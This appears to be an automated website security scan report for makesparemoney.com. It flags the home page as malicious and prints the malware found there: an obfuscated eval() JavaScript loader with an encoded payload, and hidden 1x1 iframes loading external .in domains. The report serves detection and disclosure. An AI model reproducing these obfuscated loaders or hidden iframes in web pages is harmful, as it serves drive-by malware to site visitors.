Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=makesparemoney.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://makesparemoney.com/ | 200 OK Content-Length: 21997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(";zvnzuCQiPgqkeQh=vvCzAZkbRjPCyWITmDzJZhHkvLoEFMGsYPbgZZEvdU;)mOsBucAFshfrzPOoxHeIfw(etirw.tnemucod;veDdFBQDVvfBjtDFFOhxmjNCw=WiDrcuLYpWYIUFqecGrAreEvgqRqICcPrwdEBNeTIFtas };)XjPvDyJdEkVpEyoI(edoCrahCmorf.gnirtS=+mOsBucAFshfrzPOoxHeIfw;kSCRmTMQhpIcKlDySFoHchoMhVCfIes=zvnzuCQiPgqkeQh ;)kSCRmTMQhpIcKlDySFoHchoMhVCfIes(tAedoCrahc.veDdFBQDVvfBjtDFFOhxmjNCw=^XjPvDyJdEkVpEyoI )XjPvDyJdEkVpEyoI=!)kSCRmTMQhpIcKlDySFoHchoMhVCfIes(tAedoCrahc.veDdFBQDVvfBjtDFFOhxmjNCw(fi ;DhykppCnUwsHBwlTaVxnXHVAKqIyl Decoded script: wfIeHxoOPzrfhsFAcuBsOm='';ZuiCM=wfIeHxoOPzrfhsFAcuBsOm;wCNjmxhOFFDtjBfvVDQBFdDev='UzDGWVZIPYdXouvLPOmLFtyjmzocTOUhdoQSqNhPYgUEyAO';WwSbNBgUrBzfo=ZuiCM;seIfCVhMohcHoFSyDlKcIphQMTmRCSk=0;eseGLoQRqEoLwOuAuYmXgLXLklnrMuR=WwSbNBgUrBzfo;twhunhbO='%46%2D%21%25%37%37%2C%70%2A%16%3B%52%57%1E%38%24%3F%57%63%69%17%0A%1C%08%08%1B%4D%3D%21%7A%01%0A%41%32%34%18%71%0C%35%3F%06%20%29%0D%63%6F%33%08%25%2A%32%34%35%3B%34%3C%16%65%4D%45%54%6C%23%2C%1F%23%2A%18%10%04%0A%47%4D%0D%3B%6D%75%68%01%06%36%3B%05%73%4 <iframe src="http://csvert.in/in.cgi?default" frameborder="0" scrolling="no" height="1" width="1" hspace="1" vspace="1" marginwidth="0" marginheight="0"></iframe> Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://sluxxqqgykewolmoli.in/in.cgi?default <iframe src="http://sluxxqqgykewolmoli.in/in.cgi?default" width=1 height=1 frameborder=0> | ||
http://makesparemoney.com/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://makesparemoney.com/js/cufon-yui.js | 200 OK Content-Length: 18257 Content-Type: text/javascript | clean |
http://makesparemoney.com/js/Bell_Gothic_Std_500.font.js | 200 OK Content-Length: 44113 Content-Type: text/javascript | clean |
http://makesparemoney.com/js/Bell_Gothic_Std_700.font.js | 200 OK Content-Length: 45520 Content-Type: text/javascript | clean |
http://makesparemoney.com/js/cufon-replace.js | 200 OK Content-Length: 333 Content-Type: text/javascript | clean |
http://makesparemoney.com/index.html | 200 OK Content-Length: 21997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(";zvnzuCQiPgqkeQh=vvCzAZkbRjPCyWITmDzJZhHkvLoEFMGsYPbgZZEvdU;)mOsBucAFshfrzPOoxHeIfw(etirw.tnemucod;veDdFBQDVvfBjtDFFOhxmjNCw=WiDrcuLYpWYIUFqecGrAreEvgqRqICcPrwdEBNeTIFtas };)XjPvDyJdEkVpEyoI(edoCrahCmorf.gnirtS=+mOsBucAFshfrzPOoxHeIfw;kSCRmTMQhpIcKlDySFoHchoMhVCfIes=zvnzuCQiPgqkeQh ;)kSCRmTMQhpIcKlDySFoHchoMhVCfIes(tAedoCrahc.veDdFBQDVvfBjtDFFOhxmjNCw=^XjPvDyJdEkVpEyoI )XjPvDyJdEkVpEyoI=!)kSCRmTMQhpIcKlDySFoHchoMhVCfIes(tAedoCrahc.veDdFBQDVvfBjtDFFOhxmjNCw(fi ;DhykppCnUwsHBwlTaVxnXHVAKqIyl Decoded script: wfIeHxoOPzrfhsFAcuBsOm='';ZuiCM=wfIeHxoOPzrfhsFAcuBsOm;wCNjmxhOFFDtjBfvVDQBFdDev='UzDGWVZIPYdXouvLPOmLFtyjmzocTOUhdoQSqNhPYgUEyAO';WwSbNBgUrBzfo=ZuiCM;seIfCVhMohcHoFSyDlKcIphQMTmRCSk=0;eseGLoQRqEoLwOuAuYmXgLXLklnrMuR=WwSbNBgUrBzfo;twhunhbO='%46%2D%21%25%37%37%2C%70%2A%16%3B%52%57%1E%38%24%3F%57%63%69%17%0A%1C%08%08%1B%4D%3D%21%7A%01%0A%41%32%34%18%71%0C%35%3F%06%20%29%0D%63%6F%33%08%25%2A%32%34%35%3B%34%3C%16%65%4D%45%54%6C%23%2C%1F%23%2A%18%10%04%0A%47%4D%0D%3B%6D%75%68%01%06%36%3B%05%73%4 <iframe src="http://csvert.in/in.cgi?default" frameborder="0" scrolling="no" height="1" width="1" hspace="1" vspace="1" marginwidth="0" marginheight="0"></iframe> Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://sluxxqqgykewolmoli.in/in.cgi?default <iframe src="http://sluxxqqgykewolmoli.in/in.cgi?default" width=1 height=1 frameborder=0> | ||
http://makesparemoney.com/index-1.html | 200 OK Content-Length: 5434 Content-Type: text/html | clean |
http://makesparemoney.com/index-2.html | 200 OK Content-Length: 5223 Content-Type: text/html | clean |
http://makesparemoney.com/index-3.html | 200 OK Content-Length: 5398 Content-Type: text/html | clean |
http://makesparemoney.com/index-4.html | 200 OK Content-Length: 6423 Content-Type: text/html | clean |
http://makesparemoney.com/index-5.html | 200 OK Content-Length: 6324 Content-Type: text/html | clean |
http://makesparemoney.com/test404page.js | 404 Not Found Content-Length: 399 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: makesparemoney.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 16:41:27 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 21997
Content-Type: text/html
Last-Modified: Mon, 23 Apr 2012 15:10:43 GMT
...21997 bytes of data.
GET / HTTP/1.1
Host: makesparemoney.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 16:41:27 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 21997
Content-Type: text/html
Last-Modified: Mon, 23 Apr 2012 15:10:43 GMT
...21997 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: makesparemoney.com
Referer: http://www.google.com/search?q=makesparemoney.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: makesparemoney.com
Referer: http://www.google.com/search?q=makesparemoney.com
Result:
The result is similar to the first query. There are no suspicious redirects found.